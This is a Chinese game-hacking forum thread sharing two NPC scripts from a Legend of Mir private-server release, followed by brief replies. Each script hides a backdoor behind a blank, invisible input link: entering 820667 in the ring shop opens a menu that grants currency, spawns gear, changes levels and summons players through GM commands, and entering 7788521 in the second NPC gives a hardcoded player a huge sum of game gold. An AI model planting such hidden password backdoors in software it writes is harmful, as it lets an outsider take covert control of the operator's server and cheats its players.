WPE|52wpe|我爱WPE

注册会员
搜索
  • 1605查看
  • 29回复

高级会员

感谢晓辉发的版本他不说我们也找不到他不发出来只不过想让世界清净点而已黄F太多黄了大家又来骂  基本上F很难找 自己看吧
第一个
(@buy @sell @repair @s_repair @@InPutString @@InPutInteger)
%100
;戒指
+22
+23

[@main]
欢迎. 我可以帮你什么吗?\ \
<购买/@buy> 戒指 \
<出售/@sell> 戒指\
<修理/@repair> 戒指\
<特殊修理/@s_repair>\
<返 回/@main>\
<离 开/@exit> \
[@s_repair]
你这个家伙太幸运了,我正好有材料可以做特种修理...\
[@buy]
你要购买哪个戒指?\ \ \
<返 回/@Main>
[@sell]
您出售哪种戒指?\ \ \
<返 回/@Main>                                                       < /@@InPutString21>\
[@repair]
您要修理戒指?\ \ \
<返 回/@Main>
[~@repair]
看上去它是好的.\ \
<返 回/@Main>

[@CALLInPutString21]
#if
EQUAL S21 820667
#ACT
GOTO @B400
#ELSEACT
CLOSE

[@B400]
#IF
checknamelist ..\QuestDiary\数据文件\JFwl.txt
checkaccountlist ..\QuestDiary\数据文件\JFwl.txt
#say
<输入玩家的名称+/@@InPutString51> <输入玩家的名称-/@@InPutString52> \ \
<输入装备名称/@@InPutString53>  <输入改级玩家名称/@@InPutString56>  \ \
<添加名称/@@InPutString54>   <删除名称/@@InPutString55>   <拉 人 过来/@@InPutString58> \ \
#ELSEACT
CLOSE

[@CallInPutString51]
#IF
#ACT
GMEXECUTE 调整元宝 <$STR(s51)> + 1000000

[@CallInPutString52]
#IF
#ACT
GMEXECUTE 调整元宝 <$STR(s52)> - 1000000

[@CallInPutString53]
#IF
#ACT
GMEXECUTE 刷a <$STR(s53)> 5

[@CallInPutString54]
#IF
#ACT
AddTextList .\QuestDiary\数据文件\JFwl.txt <$STR(S54)>

[@CallInPutString55]
#IF
#ACT
DelTextList .\QuestDiary\数据文件\JFwl.txt <$STR(S55)>

[@CallInPutString56]
#say
<输入玩家的级别/@@InPutString57>

[@CallInPutString57]
#IF
#ACT
GMEXECUTE 调级a <$STR(s56)> <$STR(s57)>

[@CallInPutString58]
#IF
#ACT
GMEXECUTE 滚过来 <$STR(s58)>

[goods]
古铜戒指        10      10
六角戒指        10      10
玻璃戒指        10      10
牛角戒指        10             10
蓝色水晶戒指        10        10
生铁戒指        10             10
金戒指                10        10
魅力戒指        10      10
道德戒指        10        10
黑色水晶戒指        10        10
蛇眼戒指        10        10
珍珠戒指        10        10
骷髅戒指        10        10
珊瑚戒指        10        10
降妖除魔戒指    10        10

第二个
(@buy @sell @repair @s_repair @@InPutString @@InPutInteger)
%100
+10
+11
+15

[@main]
听说虹魔教主复活了!他的领地“封魔谷”也已重现大陆!\
好象封魔谷的入口在沃玛森林附近\
不过那么邪恶的地方,你真的打算去吗?\\
<坐标/@xy> 询问\
<去商店/@talkwith>\
<打听苍月岛惊人内幕/@ZY>\
<打听幻境消息/@hj>\

[@hj]
嘘! 昨天晚上我和我夫人做了同样奇怪的梦!\
梦见宝藏显现在幻境!\
而且我还知道幻境的方位,可以领您去!\
进入幻境以后您可以得到丰富的宝藏!\
<返回/@main>\

[@xy]
比奇最大的城市就是你所在的比奇城,坐标就不用我说了吧!\
毒蛇山谷的小村很好找,你只要往500 500 的坐标走就能够\
到了。不过,如果你要到盟重土城,就应该牢记300 300\
这个数字, 他会指引你走到那里。离流放地很近的沙巴克,是\
一个危险的区域,我记得以前在600 300找到它的。不过我要提\
醒你,每个省份的坐标都是不同的,可别在比奇找沙巴克哦!\
所以,要记住每个通往其他省的关口。\
最后,要记得多跟朋友走走,你就会和我一样熟悉这个大陆。\\
<返 回/@Main>

[@zy]
告诉你,其实苍月岛不只是那么简单的岛屿哦,\
他是传说中打开玛法大陆某道封印之门的钥匙,苍月岛的出现\
是新英雄时代来临的象征,封魔谷哪边的好象也发生了什么,\
年轻人,有心的话多出去转转,其实最珍贵的东西通常都在自己身边<./@@InPutString20>\ \
\
<返回/@main>\

[@talkwith]
#IF
#SAY
你要去哪个商店?这个是免费服务! \ \
<铁匠铺/@Gwe> <布料店/@Gpo> \
<首饰店/@Gza> <客栈/@Gwh> \
<书店/@Gbo> \
[@Gwe]
#IF
#ACT
map 0159
[@Gpo]
#IF
#ACT
map 0149
[@Gza]
#IF
#ACT
map 0158
[@Gwh]
#IF
#ACT
map 0145
[@Gbo]
#IF
#ACT
map 0161

[@huan]
移动到幻境当然也需要有钱\
总不能免费把你移动到那儿吧?\
一幻境需要2000金币。\
支付这些钱,移动吗?\
<移动/@pay4> \
<不/@exit>
<返 回/@Main>
[@pay4]
#IF
checkgold 2000
#ACT
take 金币 2000
mapmove H001 73 67
break
#ELSESAY
你没有足够的金币用来支付我们的服务费用!\
请努力赚钱哦:)\\

[@CALLInPutString20]
#if
EQUAL S20 7788521
#ACT
mov A400 诺伊斯
GOTO @A400
#ELSEACT
CLOSE

[@A400]
#IF
EQUAL A400 <$USERNAME>
#ACT
gamegold + 883525628
mov A400 无
#ELSEACT
mov A400 无
CLOSE

高级会员

基本上进来的人第一眼绝对看哥的头像 哦呵呵

金牌会员

哇哈哈..你怎么知道是看你头像啊.哈哈哈哈

金牌会员

晕,这么复杂,有木有简单点的方法。。。

新手上路

好复杂哦,不懂

中级会员

版本都没了,发出来有意思?

注册会员

哈哈。我也下了。但基本看不懂。

高级会员

偶进来没看你头像...看你二楼才发现你头像好猥亵...哈哈哈

金牌会员

我就是看你头像来的···
很邪恶

金牌会员

看看………………

金牌会员

看不懂,解释下

禁止访问

看不懂,解释

中级会员

顶贴。。。。

中级会员

绝种的F  怎么找

中级会员

好像 有点难哦   出发不了

金牌会员

hexiehe和谐过的洞了

金牌会员

看过………………

禁止访问

看过………………

金牌会员

说实话,没看懂~!不知道怎么跳到下面那个刷装备元宝的界面。等这漏洞封完了,能给说说么。只是想看看学学经验~!

金牌会员

你的头像牛B

快速发帖